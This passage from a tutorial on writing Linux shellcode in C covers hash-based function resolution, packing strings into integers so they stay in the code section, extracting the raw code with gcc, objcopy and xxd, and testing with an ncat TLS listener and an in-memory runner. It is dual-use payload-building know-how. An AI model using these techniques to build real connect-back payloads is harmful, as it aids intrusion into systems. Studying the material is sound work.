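The union lets one block of memory hold hashes before resolution and function pointers afterwards. The sketch below illustrates that idea with two local stand-in functions instead of libc, and a trivial resolver in place of a real symbol lookup. All names here (demo_table_t, demo_resolve, demo_resolve_table and so on) are hypothetical, and the layout assumes pointers are 64 bits wide.

```c
#include <stddef.h>
#include <stdint.h>

typedef int (*binop_t)(int, int);

/* Stand-ins for library functions. */
int demo_add(int a, int b) { return a + b; }
int demo_mul(int a, int b) { return a * b; }

/* Hash of a function name (same algorithm as gnu_hash). */
uint32_t hash_name(const char *s) {
    uint32_t h = 5381;

    for (; *s; s++)
        h = (h << 5) + h + (uint8_t)*s;
    return h;
}

typedef struct {
    union {
        uint64_t hash[2];    /* before resolution: hashes of the names  */
        void    *addr[2];    /* after resolution: addresses             */
        struct {             /* the same slots viewed as typed pointers */
            binop_t _add;
            binop_t _mul;
        };
    } api;
} demo_table_t;

/* Hypothetical resolver standing in for a lookup by hash. */
void *demo_resolve(uint32_t hash) {
    if (hash == hash_name("add")) return (void *)demo_add;
    if (hash == hash_name("mul")) return (void *)demo_mul;
    return NULL;
}

/* Replace each hash with the resolved address, in place.
   Returns 1 on success, 0 if any entry could not be resolved. */
int demo_resolve_table(demo_table_t *t, size_t count) {
    for (size_t i = 0; i < count; i++) {
        t->api.addr[i] = demo_resolve((uint32_t)t->api.hash[i]);
        if (t->api.addr[i] == NULL) return 0;
    }
    return 1;
}
```

After demo_resolve_table succeeds, a call such as t.api._add(2, 3) goes straight through the resolved pointer, and the whole table can be passed to other subroutines as a single argument.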

9.2 Strings

Declaring strings is a slight problem for a shellcode because gcc will move them all to a read-only section (.rodata) that is separate from the .text section. There are a few ways to work around this. elfmaster suggests using the -N option of the linker ld to combine all segments into one. fishstiqz uses a combination of macros and inline assembly. What I do is declare an array of integers large enough to hold the string, e.g. int str[16]; that array is then initialized using the string converted to integers. gcc should do this automatically, but it’s currently not an option. The following code generates the initializers: len is initialized to the length of the string, the input is read as an array of integers, and one assignment is printed for each word.

    int *str;
    
    len = strlen(input);
    str = (int*)input;
    
    // align up by 4
    len = (len & -4) + 4;
    len >>= 2;
    
    for(i=0;i<len;i++) {
      printf("str[%i] = 0x%08x;\n", i, str[i]);
    }

As an example, the string “/proc/self/maps” becomes:

    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
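A variant of the conversion that never reads past the end of the input is to copy the string into a zeroed word buffer first. This is a minimal sketch, assuming a little-endian machine; pack_string is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Pack s, including its terminating NUL, into 32-bit words.
   Returns the number of words used, or 0 if out is too small. */
size_t pack_string(const char *s, uint32_t *out, size_t max_words) {
    size_t len   = strlen(s) + 1;   /* bytes to store, with the NUL */
    size_t words = (len + 3) / 4;   /* round up to whole words      */

    if (words > max_words) return 0;

    memset(out, 0, words * sizeof(uint32_t)); /* zero the padding bytes */
    memcpy(out, s, len);
    return words;
}
```

Printing each word of the result with the format 0x%08x reproduces the assignments shown for “/proc/self/maps”.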

One might also consider storing all strings in a separate block of data that is then simply passed to each subroutine as a parameter.

9.3 Compiling

A Makefile is provided to compile and extract the shellcode automatically. It uses gcc to compile and objcopy to extract. xxd then converts the binary in tls.bin to a C style string and redirects output to tls.h. Don’t forget that tls.c uses port 1234 and 127.0.0.1 as the peer address because it’s only a proof of concept.

  gcc -O0 -nostdlib -fpic tls.c -o tls
  objcopy -O binary --only-section=.text tls tls.bin
  xxd -i tls.bin > tls.h

The gcc option -O0 disables optimizations, -nostdlib prevents linking against the standard startup files and libraries, and -fpic generates position-independent code. objcopy simply extracts the executable code stored in the .text section.

9.4 Testing

ncat, which comes bundled with nmap, supports raw I/O using TLS/SSL. The following will listen for incoming SSL/TLS connections on port 1234 using any IPv4 interface.

  ncat -lvk4 1234 --ssl

runsc.c can be used to execute the code from memory.

  runsc -x -f tls.bin

10. Summary

As you can see, it’s entirely possible to avoid using pure assembly code for a PIC. Admittedly, some assembly is used here to work around limitations of C itself, but it would be completely avoidable if the C code was supplied with a valid address of the host process, libc.so or any other shared object. Sources can be found here.
